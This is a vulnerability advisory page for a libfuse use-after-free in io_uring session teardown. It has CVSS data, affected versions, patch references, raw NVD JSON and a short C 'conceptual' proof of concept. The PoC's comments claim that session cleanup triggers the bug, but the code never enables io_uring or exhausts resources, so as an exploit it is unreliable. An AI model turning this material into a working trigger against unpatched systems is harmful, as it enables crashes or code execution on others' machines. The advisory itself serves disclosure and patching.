Security Vulnerability Report
CVE-2026-33150 CVSS 7.8 HIGH

CVE-2026-33150

Published: 2026-03-20 21:17:15
Last Modified: 2026-03-23 19:16:15

Description

libfuse is the reference implementation of the Linux FUSE. From version 3.18.0 to before version 3.18.2, a use-after-free vulnerability in the io_uring subsystem of libfuse allows a local attacker to crash FUSE filesystem processes and potentially execute arbitrary code. When io_uring thread creation fails due to resource exhaustion (e.g., cgroup pids.max), fuse_uring_start() frees the ring pool structure but stores the dangling pointer in the session state, leading to a use-after-free when the session shuts down. The trigger is reliable in containerized environments where cgroup pids.max limits naturally constrain thread creation. This issue has been patched in version 3.18.2.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:libfuse_project:libfuse:*:*:*:*:*:*:*:* - VULNERABLE
libfuse versions from 3.18.0 up to, but not including, 3.18.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// Conceptual Proof of Concept for CVE-2026-33150
// Trigger condition: Resource exhaustion leading to io_uring thread creation failure.
#define FUSE_USE_VERSION 35        // must be defined before any libfuse header
#include <fuse3/fuse_lowlevel.h>   // fuse_session_* API and struct fuse_lowlevel_ops
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

// fuse_session_new() expects the low-level operations table
static const struct fuse_lowlevel_ops oper = {0};

int main(int argc, char *argv[])
{
    struct fuse_args args = FUSE_ARGS_INIT(argc, argv);

    // Simulate resource exhaustion to trigger the bug
    // In a real container, hitting pids.max causes fuse_uring_start to fail
    printf("Attempting to trigger resource exhaustion...\n");

    // Create FUSE session
    struct fuse_session *se = fuse_session_new(&args, &oper, sizeof(oper), NULL);
    if (!se) {
        perror("fuse_session_new");
        fuse_opt_free_args(&args);
        return 1;
    }

    if (fuse_session_mount(se, "/tmp/fuse_test") != 0) {
        perror("fuse_session_mount");
        fuse_session_destroy(se);
        fuse_opt_free_args(&args);
        return 1;
    }

    printf("Session started. Trigger cleanup to cause UAF...\n");

    // Cleanup triggers the use-after-free on the dangling pointer
    fuse_session_unmount(se);
    fuse_session_destroy(se);
    fuse_opt_free_args(&args);
    return 0;
}

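References

https://github.com/libfuse/libfuse/commit/49fcd891a58f622c098e2ca67d66086f7b213836 (Patch)
https://github.com/libfuse/libfuse/releases/tag/fuse-3.18.2 (Product, Release Notes)
https://github.com/libfuse/libfuse/security/advisories/GHSA-qxv7-xrc2-qmfx (Vendor Advisory)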

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33150", "sourceIdentifier": "[email protected]", "published": "2026-03-20T21:17:15.410", "lastModified": "2026-03-23T19:16:14.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libfuse is the reference implementation of the Linux FUSE. From version 3.18.0 to before version 3.18.2, a use-after-free vulnerability in the io_uring subsystem of libfuse allows a local attacker to crash FUSE filesystem processes and potentially execute arbitrary code. When io_uring thread creation fails due to resource exhaustion (e.g., cgroup pids.max), fuse_uring_start() frees the ring pool structure but stores the dangling pointer in the session state, leading to a use-after-free when the session shuts down. The trigger is reliable in containerized environments where cgroup pids.max limits naturally constrain thread creation. This issue has been patched in version 3.18.2."}, {"lang": "es", "value": "libfuse es la implementación de referencia de FUSE de Linux. Desde la versión 3.18.0 hasta antes de la versión 3.18.2, una vulnerabilidad de uso después de liberación en el subsistema io_uring de libfuse permite a un atacante local colapsar procesos del sistema de archivos FUSE y potencialmente ejecutar código arbitrario. Cuando la creación de hilos de io_uring falla debido al agotamiento de recursos (por ejemplo, cgroup pids.max), fuse_uring_start() libera la estructura del pool de anillos pero almacena el puntero colgante en el estado de la sesión, lo que lleva a un uso después de liberación cuando la sesión se cierra. El disparador es fiable en entornos contenerizados donde los límites de cgroup pids.max restringen naturalmente la creación de hilos. 
Este problema ha sido parcheado en la versión 3.18.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libfuse_project:libfuse:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.18.0", "versionEndExcluding": "3.18.2", "matchCriteriaId": "83EF6E3E-F5F2-4CE2-B497-62493DAB2A1F"}]}]}], "references": [{"url": "https://github.com/libfuse/libfuse/commit/49fcd891a58f622c098e2ca67d66086f7b213836", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/libfuse/libfuse/releases/tag/fuse-3.18.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/libfuse/libfuse/security/advisories/GHSA-qxv7-xrc2-qmfx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}